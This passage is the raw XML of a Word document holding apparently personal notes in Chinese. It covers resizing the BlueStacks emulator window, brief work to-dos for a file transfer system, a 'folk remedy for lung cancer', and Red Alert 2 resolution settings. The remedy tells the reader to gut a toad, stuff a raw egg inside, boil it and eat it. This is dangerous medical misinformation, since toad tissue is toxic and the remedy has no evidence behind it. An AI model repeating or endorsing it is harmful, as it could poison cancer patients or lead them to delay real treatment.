          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4562475" cy="3324225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="4" name="图片 4" descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_20140617160100589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descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_2014061716010058927.jp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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：修改完成后重启</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BlueStacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>就可以看到效果了，可以右键点击电脑右下角</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BlueStacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>图标，选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>重新开始</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00667930" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3086100" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_2014061716011197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 descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_2014061716011197100.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086100" cy="2952750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：修改前的效果，跟修改后的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00667930" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762500" cy="3333750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_20140617160128985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0" descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_2014061716012898565.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762500" cy="3333750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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修改成高</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">600 </w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>宽</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>400</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的效果图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00667930" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3962400" cy="6496050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_2014061716021869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9" descr="说明: http://www.xiazaiba.com/uploadfiles/editor/2014/0617/water_2014061716021869703.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962400" cy="6496050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00667930" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这样子看上去是不是好了很多呢？这就是我</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BlueStacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00667930">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安卓模拟器屏幕窗口大小的调整方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>传输系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="007D2FB9" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要改的地方</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>transdata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哪个更老删哪个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中科院改的地方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要回去改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>istNonMul</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成后删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="007D2FB9" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>askInfo,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写的时候还要写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不然无法接管</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>医疗保健</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>偏方治肺癌</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="008E6F67" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找一只癞蛤蟆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内脏逃出来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把生鸡蛋放进去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>锅里煮熟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>吃之</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>游戏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>红警共和国之辉</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>全屏，先选兼容性到</w:t>
      </w:r>
      <w:r>
        <w:t>xp sp2</w:t>
      </w:r>
      <w:r>
        <w:t>等试试，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在红警</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>游戏目录中找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RA2.INI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，找到如下数值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00625EFF" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>[Video]ScreenWidth=1024ScreenHeight=768StretchMovies=no</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00F8085B" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[Video]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的下面加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AllowHiResModes=yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44832" w:rsidRPr="00D35B85" w:rsidRDefault="00E44832"/>
    <w:sectPr w:rsidR="00E44832" w:rsidRPr="00D35B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0BB3" w:rsidRDefault="00F50BB3" w:rsidP="00D35B85">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F50BB3" w:rsidRDefault="00F50BB3" w:rsidP="00D35B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新宋体">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ˎ̥">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000"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0BB3" w:rsidRDefault="00F50BB3" w:rsidP="00D35B85">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F50BB3" w:rsidRDefault="00F50BB3" w:rsidP="00D35B8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B43F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EEBE8B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CF3A2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA7029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F3053B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FB29C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F7F286D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="376A5F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5411702"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4B6247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DD03463"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EEEE09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526307C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23582D5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D593C96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="070478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9BA3345"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="590CBD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3E531EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B36A62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C583D25"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25908A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26558EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9B8E9C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BE375DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACD03F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7C21413C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF12AB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8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="12"/>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6C8"/>
    <w:rsid w:val="00001B7D"/>
    <w:rsid w:val="00006EFB"/>
    <w:rsid w:val="0001495B"/>
    <w:rsid w:val="00042051"/>
    <w:rsid w:val="000570B6"/>
    <w:rsid w:val="0005777E"/>
    <w:rsid w:val="00067E31"/>
    <w:rsid w:val="000E6F96"/>
    <w:rsid w:val="00101376"/>
    <w:rsid w:val="001078B8"/>
    <w:rsid w:val="001936EB"/>
    <w:rsid w:val="001D26AE"/>
    <w:rsid w:val="00253CB1"/>
    <w:rsid w:val="00275F3D"/>
    <w:rsid w:val="002A3ABA"/>
    <w:rsid w:val="002D5B3B"/>
    <w:rsid w:val="002E5BCB"/>
    <w:rsid w:val="00333D38"/>
    <w:rsid w:val="00353597"/>
    <w:rsid w:val="00367E2F"/>
    <w:rsid w:val="00412259"/>
    <w:rsid w:val="00442D77"/>
    <w:rsid w:val="004B19A4"/>
    <w:rsid w:val="004C24B4"/>
    <w:rsid w:val="004C6851"/>
    <w:rsid w:val="004E691B"/>
    <w:rsid w:val="00505802"/>
    <w:rsid w:val="00553530"/>
    <w:rsid w:val="00563C4D"/>
    <w:rsid w:val="00590FB3"/>
    <w:rsid w:val="00603C4D"/>
    <w:rsid w:val="00614FE5"/>
    <w:rsid w:val="00681B37"/>
    <w:rsid w:val="006846F9"/>
    <w:rsid w:val="00690833"/>
    <w:rsid w:val="006A182C"/>
    <w:rsid w:val="006C0EA0"/>
    <w:rsid w:val="006F42DA"/>
    <w:rsid w:val="00714223"/>
    <w:rsid w:val="00725067"/>
    <w:rsid w:val="0073297B"/>
    <w:rsid w:val="007C40F9"/>
    <w:rsid w:val="00801337"/>
    <w:rsid w:val="00830594"/>
    <w:rsid w:val="0086553D"/>
    <w:rsid w:val="00895DCD"/>
    <w:rsid w:val="008B62DC"/>
    <w:rsid w:val="008E317F"/>
    <w:rsid w:val="00900865"/>
    <w:rsid w:val="00975F15"/>
    <w:rsid w:val="009C09B6"/>
    <w:rsid w:val="00A06E23"/>
    <w:rsid w:val="00A14522"/>
    <w:rsid w:val="00A35080"/>
    <w:rsid w:val="00A63388"/>
    <w:rsid w:val="00AB54A0"/>
    <w:rsid w:val="00AC5B0E"/>
    <w:rsid w:val="00AD4D24"/>
    <w:rsid w:val="00AF74C7"/>
    <w:rsid w:val="00B02B9B"/>
    <w:rsid w:val="00B27AA0"/>
    <w:rsid w:val="00B9581A"/>
    <w:rsid w:val="00BD6F4C"/>
    <w:rsid w:val="00C0370A"/>
    <w:rsid w:val="00CE06C8"/>
    <w:rsid w:val="00CE0D52"/>
    <w:rsid w:val="00CE3D81"/>
    <w:rsid w:val="00CF6BC3"/>
    <w:rsid w:val="00D16A25"/>
    <w:rsid w:val="00D16E5C"/>
    <w:rsid w:val="00D24FE8"/>
    <w:rsid w:val="00D35B85"/>
    <w:rsid w:val="00D44A37"/>
    <w:rsid w:val="00D4623D"/>
    <w:rsid w:val="00D93859"/>
    <w:rsid w:val="00D97C6D"/>
    <w:rsid w:val="00DA5374"/>
    <w:rsid w:val="00E33935"/>
    <w:rsid w:val="00E44832"/>
    <w:rsid w:val="00E66EA8"/>
    <w:rsid w:val="00E77EA0"/>
    <w:rsid w:val="00EF7EAD"/>
    <w:rsid w:val="00F10FE2"/>
    <w:rsid w:val="00F21BE7"/>
    <w:rsid w:val="00F50BB3"/>
    <w:rsid w:val="00FB74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5B85"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="楷体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00D35B85"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
